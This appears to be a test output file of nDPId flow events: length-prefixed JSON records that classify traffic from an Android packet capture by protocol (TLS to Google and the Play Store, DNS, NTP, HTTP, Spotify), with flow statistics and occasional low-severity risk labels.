00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
